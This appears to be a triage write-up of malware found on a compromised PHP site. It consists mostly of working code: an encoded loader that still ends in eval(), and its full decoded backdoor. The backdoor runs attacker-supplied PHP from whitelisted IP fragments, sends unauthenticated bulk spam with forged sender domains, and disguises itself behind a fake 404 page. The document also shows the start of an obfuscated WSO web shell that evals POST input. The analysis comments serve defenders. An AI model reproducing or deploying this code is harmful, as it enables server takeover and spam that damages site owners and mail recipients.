'FmrZFmrZFmrZO6EZFmrZFmrZFmrZFmrZFmrZKX5kQvgC7riuOegkQqHkx6DXKqbCBYYZPqGZFc9ZVb+ZF'.
'c7EyirZFmrZFmrZFmrZFmrZFmrZFmrZFcMCWcgZFTJZOvIpKvtC7JMXBrMlIMtuab'.
'D2DvIpKvtC7JMXBrMYzMtuICDRLirZFmrZFmrZFmrZFmrZFmrlhCiZOdxCDdb'.
'kzrMXKqbCBLr2GPnfGbDuzkrEBmMXKqbCBmJZOdxCDdbkzrMXKqbCBLL2FbNEG6EZFmrZF'.
'mrZFmrZFmroyirZFmrZFmrZFmrZFmMXKqbCBmtfBmzWOukpANIWKTzRLirZFmrZFmrZFmrZFmEZFm'.
'rZFmrZFmrZFmruOuAkWvAkjyr2SbrZMd5pDcApDyHYOALXGirCWeLpKASCWcnp7T50FxjYjkHXQJIpBxxkQ'.
'NApQd5XKvMWOukpzZUFzmrZFmrZFmrZFmrZFcIXWqxXWdbZFTJZFuVp7sbX'.
'hsb2hNApQYblVirZzsaYOu6XhTiuKcgYKPn2zukkANtZS6EZFmrZFmrZFeJFzmrZFmrZFmruOuAkWvAkjyr2Sb'.
'rZANIWKTzRLirZFmrZFmrZmirZFmrZFmrZKAQEFmMkKqIChxahIYHXWcip7yDWBmJfBm'.
'DwPJGvFkrEBmMkQvNYhvaYFmtfBmMXKqbCG6EZFmrZFmrZFmEZFmrZFmrZFemXDYIlWcAZFrMXDm6uOuAkWvA'.
'kjynRIm5EzeGXhsMZOuAkWvAkjyrEz3EZFmrZFmrZFmEZFmrZFmrZFmMkQvaZVbrZzZUZFciXhqMXWua'.
'ZVbrZzZUZFciW7cAYKvSYKvMZVbrXQq6k7wUFzmrZFmrZFmrY7gnpKwiZFqmXQv5XzrMXDmnZFMEZFmr'.
'ZFmrZFeUFzmrZFmrZFmrZFmrZFcIXW4r2SbryKXIXhqMEFcQkF'.
'Lr4GmIdFMUZF38ZdKOb2ScrHFLb2Wy5FVytHF+b2jcrHFxb2jcrzm82LirZFmrFzmrZFmrZFmrZFmrZF38Zd'.
'FobCVy5HFIb2WcrdF1b2mrb2jy6dFUb2ScgJFTbC3rb2oy6dFab25y5HF'.
'Ib29y5HFIZdFIZdF1b2Uy5YKFb2Wy5YKFb2wrEz3EZFmrZFmrZFmrZFmr'.
'lhCiZFPruKgoXKvbXhdbXhyruzCrkjcIkKJaEFcIXW46ZFukkANtWOukpzZnZGbJcMq4wbwrEyirZ'.
'FmrZFmrZFmrZFeUFzmrZFmrZFmrZFmrZFmrZFm5EzVyHJFLb2fy5HFUb2Uy6HF1b2rrbCfyHHFxZdKebCoytdKFb2Vy5YK2ZFb'.
'rb29y5HKmbCVyHYF1bC2ytdKmbCfyHYF3ZdF1b2Uy5YKFb2Wy5YKFZFi5FzmrZFmrZFmrZFmrZF'.
'mrZFmMlqJMXWcACjcAXFmJZOcIYhwUFzmrZFmrZFmrZFmrZFmrZFmEZFmr'.
'ZFmrZFmrZFmrZFmrZFciXhqMXWuaZVbrkjvzkjcIEFcIXW46ZVm6ZO'.
'dbkDe5kIrMkQva2FmzWOukpANIWKTzEBMUFzmrZFmrZFmrZFmrZFmrZFmMkQvaZVbrkjvzkjcIEF'.
'cIXW46ZOdbkDe5kIrMkQva2FmzWOukpANIWKTzEB6bEG6EZFmrZFmrZFmrZFmrZFmrZmirZFm'.
'rZFmrZFmrZFmrZFmr2IirBKvgXKvIkIebpIeekDug0Bm82LirZFmrZFmrZFmrZFmrZFmrlhCiZ'.
'FcLCWugpWdpujuAYOvIpzYYfGbDlKvgXKvIkIkroOLruOegkQqHkx6DkQvbYWutuxbJfBY'.
'gkDug0BkEZFmrZFmrZFmrZFmrZFmrZFmrZFe3oFmilWdaXWyiuOegkQqHkx6DkQvMlWuACjyDWBMruzCruOegkQqHkx6DkQvM'.
'lWuACjyDWGbJYOuxXBMrEyirZFmrZFmrZFmrZFmrZFmr0LirZFmrZFmrZFmrZFmrZFmrZFmrZFciZVbrXWgLpKJMXBrzWOu'.
'kpzZ6ZFciXhqMXWuaEG6EZFmrZFmrZFmrZFmrZFmrZFmrZFmMlKvgXKvIkImJZKqIkQq'.
'sEFMUFzmrZFmrZFmrZFmrZFmrZFmrZFmrXQJIXhqSlFrruKrrCW4ruK6Jfzc7Z'.
'FMEZFmrZFmrZFmrZFmrZFmrZFmrZFeUFzmrZFmrZFmrZFmrZFm'.
'rZFmrZFmrZFmrZKAQEFeaYOuLpj4iuOC6ZFk1uIMrEyirZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFeUFzmrZFmrZFmrZFmrZF'.
'mrZFmrZFmrZFmrZFmrZFmMlImJZOdxCDdbkzrMYzLr4FLrkjcIkK'.
'JaEFc72FmDRzknEG6EZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFc7ZVbrYOunpBgaYhuaYOZiuOC'.
'6ZOdbkDe5kIrMYzLruaiDEB6NEBMUFzmrZFmrZFmrZFmrZFmrZFmrZFmrZFmrZO'.
'bEZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFmruKgAChcAkDdpkjcI'.
'YKJxkOeAkzrMlIAYZVbruOCUFzmrZFmrZFmrZFmrZFmrZFmrZFmroyirZFmrZFmrZFmrZFmrZFmroyirZFmrZFmrZFmrZF'.
'mrZFmrlhCiZKAak7vbEFcLCWugpWdpujuAXKAIXhdbuxbnZFCQZFcLCWugpWdpujuAXKAIXhd'.
'buxbJfWcIYhwruzCrlWdaXWyiuKgAChcAkDdpubNfybqwBwJRuxbnZFMEZFmrZFmrZFmrZFmrZFmrZO6EZFmrZFmrZF'.
'mrZFmrZFmrZFmrZFmMkKqIChxahIYxkQLDWBmJZFciXhqMXWuahIY4GbdevPAfGzYYRLirZFmrZFmrZFm'.
'rZFmrZFmrZFmrZKAQEFmglWdaXWyiuOegkQqHkx6DkQvMlWuACjyHC7JxpDyDWBM'.
'rEBmMkKqIChxahIYIXhcnkQvSYFxSpjvtYFYYZVbr4V6EZFmrZ'.
'FmrZFmrZFmrZFmrZFmrZFenXzrruOegkQqHkx6DkQvMlWuACjyHC7JxpDyDWGLN4FmnFzmrZFmrZFmrZFmrZFmr'.
'ZFmrZFmr0LirZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFmMkKqIChxah'.
'IYIXhcnkQvSYFxSpjvtYFYYEI6UFzmrZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFcQYhsSZVbrWxJKvwsVvPAfGAJoR'.
'LirZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFeIXWcxkQTryKAaW7JzlQvSYFrMYKgnkIMrfImMYKgnkIb+uKXxp'.
'Q4iuOegkQqHkIMrRzmMXDvtCIrMkKqIChxaEG6EZFmrZFmrZFmrZFmrZFmrZFmrZFeJFzmrZFmrZFmrZFmrZFmrZFeJF'.
'zmrZFmrZFmrZFmrZFmrZFenXzrruOegkQqHkx6DkQvbYWutuxbJfBYiXhqMXW'.
'uauImnZOuAYOvIpzmMlKvgXKvIka6EZFmrZFmrZFmrZFmroyirZFmrZFmrZObEZFmrZFmrZFmEZFmr'.
'ZFmrZFemXQd6pjdAEFcQkFMUFzmrZFeJFzmrZFeApOdAZOuAYOvIpzeKywNGcG65EzmMXWuIkjcI2zcAkDutpa6rE'.
'z3EZFmrZmirZFmrlhCiZFcLCWugpWdpujuAYOvIpzYYfGbDCWuICWMDZFMruOuAkImJZKqIkQqsEF'.
'YiXhqMXWuauab+uKgAChcAkD46ZFYSp7sbXhsbuab+uOuAkIMUFzmrZFmEZFmrZOu'.
'AYOvIpzmMkQvaRLnJ';
// Execution point: the decoded payload is handed straight to eval(), so the real
// code never exists on disk in readable form. For triage, the decoder's return
// value is inspected as text instead of being evaluated.
eval(v5T7ETO($vC3WWUF, $vNWZ3B7));?>
Once decoded (this is the code that eval() runs), that turns into this:
<?php
// Request dispatcher of the decoded payload. Analysis comments only; the code is
// left exactly as recovered.
// Branch 1 - remote code execution: a POST that carries both "code" and
// "custom_action" from an address accepted by is_good_ip() has its base64-decoded
// "code" field evaluated as PHP.
if(isset($_POST["code"]) && isset($_POST["custom_action"]) && is_good_ip($_SERVER['REMOTE_ADDR']))
{
eval(base64_decode($_POST["code"]));
exit();
}
// Branch 2 - bulk mailer: type=1 runs type1_send(). Note that this branch has no
// address check at all.
if (isset($_POST["type"]) && $_POST["type"]=="1")
{
type1_send();
exit();
}
// type=2 is an empty branch: nothing runs and control falls through to error_404().
elseif (isset($_POST["type"]) && $_POST["type"]=="2")
{
}
// Any other "type" value is echoed back unescaped and the script stops.
elseif (isset($_POST["type"]))
{
echo $_POST["type"];
exit();
}
// Every request that matched none of the branches above receives the disguised
// "not found" page, so the file looks absent to a casual visitor or scanner.
error_404();
/**
 * Address check that gates the eval() branch of the dispatcher.
 *
 * Returns TRUE when $ip contains one of the two hard-coded fragments, FALSE
 * otherwise. strstr() is a substring search, not a prefix or CIDR comparison, so
 * a fragment matches wherever it occurs inside the address string; when searching
 * logs for the operator's addresses, treat the fragments as substrings too.
 *
 * @param string $ip Address to test (the caller passes $_SERVER['REMOTE_ADDR']).
 * @return bool
 */
function is_good_ip($ip)
{
$goods = Array("6.185.239.", "8.138.118.");
foreach ($goods as $good)
{
// Loose comparison: any non-empty strstr() result counts as a match.
if (strstr($ip, $good) != FALSE)
{
return TRUE;
}
}
return FALSE;
}
/**
 * Bulk mailer entry point (dispatcher branch type=1).
 *
 * Reads the campaign from POST fields, each a base64-encoded PHP-serialized
 * array: "emails", "themes", "messages", "froms", "mailers" (all required) plus
 * "aliases" and "passes". For every recipient it picks a random subject, body,
 * sender and X-Mailer value, expands the template macros and calls send_mail().
 * Exits silently when a required field is missing or the recipient list is empty.
 */
function type1_send()
{
// All five campaign fields must be present, otherwise stop without output.
if(!isset($_POST["emails"])
OR !isset($_POST["themes"])
OR !isset($_POST["messages"])
OR !isset($_POST["froms"])
OR !isset($_POST["mailers"])
)
{
exit();
}
// Undo magic-quotes escaping so the base64 / serialized data decodes cleanly.
// get_magic_quotes_gpc() was removed in PHP 8.0, which dates the sample.
if(get_magic_quotes_gpc())
{
foreach($_POST as $key => $post)
{
$_POST[$key] = stripcslashes($post);
}
}
// unserialize() on request data; errors are suppressed with @, so malformed
// input simply yields FALSE.
$emails = @unserialize(base64_decode($_POST["emails"]));
$themes = @unserialize(base64_decode($_POST["themes"]));
$messages = @unserialize(base64_decode($_POST["messages"]));
$froms = @unserialize(base64_decode($_POST["froms"]));
$mailers = @unserialize(base64_decode($_POST["mailers"]));
$aliases = @unserialize(base64_decode($_POST["aliases"]));
$passes = @unserialize(base64_decode($_POST["passes"]));
// Overwrites request metadata in place. NOTE(review): presumably so that anything
// PHP or the host derives from these values when sending mail does not expose the
// real script path or caller address - confirm against the host's mail setup.
if(isset($_SERVER))
{
$_SERVER['PHP_SELF'] = "/";
$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
}
}
// Uploaded files become attachments; each one is renamed from the matching
// "aliases" entry after macro expansion.
if(isset($_FILES))
{
foreach($_FILES as $key => $file)
{
$filename = alter_macros($aliases[$key]);
$filename = num_macros($filename);
$filename = text_macros($filename);
$filename = xnum_macros($filename);
$_FILES[$key]["name"] = $filename;
}
}
if(empty($emails))
{
exit();
}
// One message per recipient; $fteil is the array key of the recipient entry and
// is substituted for the [FTEIL] marker in the body.
foreach ($emails as $fteil => $email)
{
// Subject: random template, then the four macro passes.
$theme = $themes[array_rand($themes)];
$theme = alter_macros($theme["theme"]);
$theme = num_macros($theme);
$theme = text_macros($theme);
$theme = xnum_macros($theme);
// Body: random template, same macro passes, plus the [FTEIL] substitution.
$message = $messages[array_rand($messages)];
$message = alter_macros($message["message"]);
$message = num_macros($message);
$message = text_macros($message);
$message = xnum_macros($message);
//$message = pass_macros($message, $passes);
$message = fteil_macros($message, $fteil);
// Sender: random template, same macro passes.
$from = $froms[array_rand($froms)];
$from = alter_macros($from["from"]);
$from = num_macros($from);
$from = text_macros($from);
$from = xnum_macros($from);
// Without a "[CUSTOM]" marker the sender's domain is rewritten to the compromised
// site's own host name by from_host(); with the marker, the marker is removed and
// the address is used as supplied.
if (strstr($from, "[CUSTOM]") == FALSE)
{
$from = from_host($from);
}
else
{
$from = str_replace("[CUSTOM]", "", $from);
}
$mailer = $mailers[array_rand($mailers)];
send_mail($from, $email, $theme, $message, $mailer);
}
}
/**
 * Builds one multipart/alternative message and hands it to PHP's mail().
 *
 * The body holds a tag-stripped plain-text part and the original HTML part, both
 * labelled ISO-8859-1 / 7bit, followed by every uploaded file in $_FILES as a
 * base64 application/octet-stream attachment. Prints "SENDED" or "FAIL" only when
 * the POST field "verbose" is non-empty; otherwise it produces no output.
 *
 * @param string $from   Value used for the From and Reply-To headers.
 * @param string $to     Recipient address.
 * @param string $subj   Subject line.
 * @param string $text   HTML body.
 * @param string $mailer Value used for the X-Mailer header.
 */
function send_mail($from, $to, $subj, $text, $mailer)
{
$head = "";
// MIME boundary token derived from the current time.
$un = strtoupper(uniqid(time()));
$head .= "From: $from\n";
$head .= "X-Mailer: $mailer\n";
$head .= "Reply-To: $from\n";
$head .= "Mime-Version: 1.0\n";
$head .= "Content-Type: multipart/alternative;";
$head .= "boundary=\"----------".$un."\"\n\n";
$plain = strip_tags($text);
$zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
$zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
$zag .= "------------".$un."--";
// Attachments are taken from the files uploaded with the same request.
if(count($_FILES) > 0)
{
foreach($_FILES as $file)
{
if(file_exists($file["tmp_name"]))
{
$f = fopen($file["tmp_name"], "rb");
$zag .= "------------".$un."\n";
$zag .= "Content-Type: application/octet-stream;";
$zag .= "name=\"".$file["name"]."\"\n";
$zag .= "Content-Transfer-Encoding:base64\n";
$zag .= "Content-Disposition:attachment;";
$zag .= "filename=\"".$file["name"]."\"\n\n";
$zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
fclose($f);
}
}
}
// Mail leaves through the server's own mail() transport, which is why the hosting
// provider sees the spam as originating from this site.
if(@mail($to, $subj, $zag, $head))
{
if(!empty($_POST['verbose']))
echo "SENDED";
}
else
{
if(!empty($_POST['verbose']))
echo "FAIL";
}
}
/**
 * Expands "{a|b|c}" alternation groups: each brace group found in $content is
 * replaced by one of its "|"-separated options chosen with rand(). Used to vary
 * subject, body, sender and attachment names from message to message.
 *
 * @param string $content Template text.
 * @return string Text with the groups replaced.
 */
function alter_macros($content)
{
// Ungreedy (U), case-insensitive (i) match of everything between braces.
preg_match_all('#{(.*)}#Ui', $content, $matches);
for($i = 0; $i < count($matches[1]); $i++)
{
$ns = explode("|", $matches[1][$i]);
$c2 = count($ns);
$rand = rand(0, ($c2 - 1));
// str_replace() swaps every occurrence of this exact group for the same choice.
$content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
}
return $content;
}
/**
 * Expands random-text markers.
 *
 * "[TEXT-min-max]" becomes a generate_word() string whose length is
 * rand(min, max); "[TEXT-n]" becomes one of length n. Each marker occurrence is
 * replaced individually (preg_replace limit 1), so repeated markers receive
 * different words.
 *
 * @param string $content Template text.
 * @return string Text with the markers replaced.
 */
function text_macros($content)
{
// Two-number form first: [TEXT-min-max].
preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$word = generate_word($rand);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
// Then the single-number form: [TEXT-n].
preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$count = $matches[1][$i];
$word = generate_word($count);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
return $content;
}
/**
 * Expands "[NUM-n]" markers into a random number with n digits, drawn with
 * rand() from the range 10^(n-1) to 10^n - 1.
 *
 * @param string $content Template text.
 * @return string Text with the markers replaced.
 */
function xnum_macros($content)
{
preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$num = $matches[1][$i];
$min = pow(10, $num - 1);
$max = pow(10, $num) - 1;
$rand = rand($min, $max);
// str_replace() replaces every identical marker with this same value.
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
/**
 * Expands "[RAND-min-max]" markers into rand(min, max).
 *
 * @param string $content Template text.
 * @return string Text with the markers replaced.
 */
function num_macros($content)
{
preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
// str_replace() replaces every identical marker with this same value.
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
/**
 * Returns a string of $length characters picked with rand() from a fixed
 * lowercase alphabet. The alphabet literal has 25 letters: it contains no "w".
 *
 * @param int $length Number of characters to produce.
 * @return string
 */
function generate_word($length)
{
$chars = 'abcdefghijklmnopqrstuvyxz';
$numChars = strlen($chars);
$string = '';
for($i = 0; $i < $length; $i++)
{
// rand(1, n) - 1 gives a zero-based index into $chars.
$string .= substr($chars, rand(1, $numChars) - 1, 1);
}
return $string;
}
/**
 * Replaces "[PASS]" in $content with the last element of $passes.
 * The only call to this function in the recovered code (inside type1_send()) is
 * commented out, so it is unused in this sample.
 *
 * @param string $content Template text.
 * @param array  $passes  List whose last element is substituted.
 * @return string
 */
function pass_macros($content, $passes)
{
$pass = array_pop($passes);
return str_replace("[PASS]", $pass, $content);
}
/**
 * Replaces "[FTEIL]" in $content with $fteil; type1_send() passes the array key
 * of the current recipient entry.
 *
 * @param string $content Template text.
 * @param mixed  $fteil   Value substituted for the marker.
 * @return string
 */
function fteil_macros($content, $fteil)
{
return str_replace("[FTEIL]", $fteil, $content);
}
/**
 * Tests whether $str is a dotted-quad IPv4 address: first octet 1-255, the other
 * three 0-255. Returns the preg_match() result (1 on match, 0 otherwise).
 */
function is_ip($str) {
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
}
/**
 * Rewrites the sender so that its domain is the compromised site's host name.
 *
 * Takes the request's Host header with a leading "www." or "ftp." removed. If
 * that is a bare IP address the sender is returned unchanged; otherwise the text
 * before the first "@" is kept and "@<host>>" is appended. The spam therefore
 * carries the victim's own domain in From/Reply-To, which is what damages the
 * site's mail reputation.
 *
 * @param string $content Sender template.
 * @return string
 */
function from_host($content)
{
$host = preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']);
if (is_ip($host))
{
return $content;
}
$tokens = explode("@", $content);
// The trailing ">" closes a "Name <local@..." style sender - presumably the
// templates are supplied in that form; the code does not check it.
$content = $tokens[0] . "@" . $host . ">";
return $content;
}
/**
 * Camouflage response for every request that matched no command branch.
 *
 * Sends a 404 status line, fetches a fixed, random-looking path from the host
 * named in the request's Host header (presumably a path that does not exist, so
 * the site's genuine "not found" page comes back), replaces that path in the
 * returned HTML with the URI actually requested (query string removed) and exits
 * with the result.
 *
 * Log indicator: each such hit causes a second request, made by the server
 * itself, for "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA" with the User-Agent that
 * custom_http_request1() sets by default.
 */
function error_404()
{
header("HTTP/1.1 404 Not Found");
$uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );
$content = custom_http_request1("http://".$_SERVER['HTTP_HOST']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
$content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );
exit( $content );
}
/**
 * Small HTTP/1.0 client built on fsockopen(); error_404() uses it to fetch a page.
 *
 * $params is either a URL string (treated as a GET) or an array. Keys read by the
 * code: 'url', 'method' (GET or POST only), 'data', 'port', 'timeout' (default
 * 30), 'return' ('content' by default, 'headers' or 'array'), 'User-Agent',
 * 'referer', 'cookie', 'redirect' and 'redirect-count'.
 *
 * Returns FALSE for an empty URL, an unsupported method or a failed connection;
 * otherwise the response body, the parsed headers, or an array holding both,
 * depending on 'return'.
 *
 * Log indicator: unless the caller supplies 'User-Agent', every request carries
 * the fixed iPhone OS 3.0 Safari string assigned below.
 */
function custom_http_request1($params)
{
if( ! is_array($params) )
{
$params = array(
'url' => $params,
'method' => 'GET'
);
}
if( $params['url']=='' ) return FALSE;
if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
$params['method'] = strtoupper($params['method']);
if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE;
/* Normalize the URL into the proper form */
$url = parse_url($params['url']);
if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
if( ! isset($url['path']) ) $url['path'] = '/';
// A URL given without a scheme parses as a bare path; split host and path by hand.
if( ! isset($url['host']) && isset($url['path']) )
{
if( strpos($url['path'], '/') )
{
$url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
$url['path'] = substr($url['path'], strpos($url['path'], '/'));
}
else
{
$url['host'] = $url['path'];
$url['path'] = '/';
}
}
// Collapse repeated slashes in the path.
$url['path'] = preg_replace("/[\\/]+/", "/", $url['path']);
if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";
$port = isset($params['port']) ? $params['port']
: ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );
$timeout = isset($params['timeout']) ? $params['timeout'] : 30;
if( ! isset($params['return']) ) $params['return'] = 'content';
// https URLs are opened through PHP's ssl:// socket transport.
$scheme = $url['scheme']=='https' ? 'ssl://':'';
$fp = @fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
if( $fp )
{
/* Mozilla */
if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";
$request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
$request .= "Host: {$url['host']}\r\n";
$request .= "User-Agent: {$params['User-Agent']}"."\r\n";
if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
if( isset($params['cookie']) )
{
$cookie = "";
if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
else $cookie = $params['cookie'];
if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
}
$request .= "Connection: close\r\n";
if( $params['method']=='POST' )
{
if( isset($params['data']) && is_array($params['data']) )
{
foreach($params['data'] AS $k => $v)
$data .= urlencode($k).'='.urlencode($v).'&';
if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
}
$data .= "\r\n\r\n";
$request .= "Content-type: application/x-www-form-urlencoded\r\n";
$request .= "Content-length: ".strlen($data)."\r\n";
}
$request .= "\r\n";
if( $params['method'] == 'POST' ) $request .= $data;
@fwrite ($fp,$request); /* Send request */
$res = ""; $headers = ""; $h_detected = false;
while( !@feof($fp) )
{
$res .= @fread($fp, 1024); /* read the content */
/* Check whether the headers are present in the content */
if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
{
/* headers have already been read - adjust the content */
$h_detected = true;
$headers = substr($res, 0, strpos($res, "\r\n\r\n"));
$res = substr($res, strpos($res, "\r\n\r\n")+4);
/* Headers to Array */
if( $params['return']=='headers' || $params['return']=='array'
|| (isset($params['redirect']) && $params['redirect']==true) )
{
$h = explode("\r\n", $headers);
$headers = array();
foreach( $h as $k=>$v )
{
if( strpos($v, ':') )
{
$k = substr($v, 0, strpos($v, ':'));
$v = trim(substr($v, strpos($v, ':')+1));
}
$headers[strtoupper($k)] = $v;
}
}
// Optional redirect following, capped at 10 hops.
if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
{
$params['url'] = $headers['LOCATION'];
if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
if( $params['redirect-count']<10 )
{
$params['redirect-count']++;
$func = __FUNCTION__;
// NOTE(review): $this is referenced inside a plain function, which suggests the
// routine was copied from a class method of some library - unconfirmed.
return @is_object($this) ? $this->$func($params) : $func($params);
}
}
if( $params['return']=='headers' ) return $headers;
}
}
@fclose($fp);
}
else return FALSE;/* $errstr.$errno; */
if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);
return $res;
}
?>
/modules/file/bs63d8.php:
<?php
/*
 * Analysis notes; the code below is unchanged from the recovered file.
 *
 * Every identifier and string literal is hex-escaped and routed through $GLOBALS
 * lookups. Decoded, the visible literals include "auth_pass", "default_action",
 * "default_use_ajax", "default_charset", "FilesMan", "Windows-1251", "SecInfo"
 * and the constant WSO_VERSION set to "2.5.1".
 *
 * What the visible code does, in order:
 *  - turns off error logging and lifts the execution time limit with ini_set()
 *    and set_time_limit();
 *  - when magic quotes are on, strips the added slashes from $_POST and $_COOKIE;
 *  - wsoLogin() answers "HTTP/1.0 404 Not Found" and dies with "404", so a failed
 *    login looks like a missing file;
 *  - the password/cookie gate runs only when $auth_pass is non-empty. No
 *    assignment to $auth_pass is visible in this paste (only the string
 *    "auth_pass" is stored in $GLOBALS), so as shown the gate is skipped -
 *    confirm against the file on disk;
 *  - actionRC(): without POST field "p1" it prints a serialize()d array holding
 *    php_uname(), the PHP version, the WSO version and the safe_mode setting;
 *    with "p1" present it passes that field to eval();
 *  - the dispatcher calls the function named "action" + POST field "a" when such
 *    a function exists. Only actionRC is defined in this copy, so a request
 *    without a matching "a" value produces an empty response.
 *
 * Review pointers: POST requests to a .php file that is not part of the Drupal
 * module it sits in, and eval() applied directly to a $_POST value.
 */
${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa\x75\x6c\x74\x5f\x61\x63t\x69\x6f\x6e";${"\x47L\x4fB\x41\x4cS"}["\x64\x77e\x6d\x62\x6a\x63"]="\x63\x6fl\x6f\x72";${${"\x47\x4c\x4f\x42\x41LS"}["\x64\x77\x65\x6dbj\x63"]}="\x23d\x665";${${"\x47L\x4fB\x41\x4c\x53"}["\x69\x77\x69rm\x78\x6c\x71\x74\x76\x79p"]}="\x46i\x6cesM\x61n";$oboikuury="\x64e\x66a\x75\x6ct\x5fc\x68\x61\x72\x73\x65t";${${"\x47L\x4f\x42\x41\x4cS"}["p\x69oy\x6bc\x65\x61"]}=true;${$oboikuury}="\x57indow\x73-1\x325\x31";@ini_set("\x65r\x72o\x72_\x6cog",NULL);@ini_set("l\x6fg_er\x72ors",0);@ini_set("max_ex\x65\x63\x75\x74\x69o\x6e\x5f\x74im\x65",0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define("WS\x4f\x5fVE\x52S\x49ON","\x32.5\x2e1");if(get_magic_quotes_gpc()){function WSOstripslashes($array){${"\x47\x4c\x4f\x42A\x4c\x53"}["\x7a\x64\x69z\x62\x73\x75e\x66a"]="\x61\x72r\x61\x79";$cfnrvu="\x61r\x72a\x79";${"GLOB\x41L\x53"}["\x6b\x63\x6ct\x6c\x70\x64\x73"]="a\x72\x72\x61\x79";return is_array(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x7ad\x69\x7ab\x73\x75e\x66\x61"]})?array_map("\x57SOst\x72\x69\x70\x73\x6c\x61\x73\x68\x65s",${${"\x47\x4cO\x42\x41LS"}["\x6b\x63\x6c\x74l\x70\x64\x73"]}):stripslashes(${$cfnrvu});}$_POST=WSOstripslashes($_POST);$_COOKIE=WSOstripslashes($_COOKIE);}function wsoLogin(){header("\x48\x54TP/1.\x30\x204\x30\x34\x20\x4eo\x74 \x46ound");die("4\x304");}function 
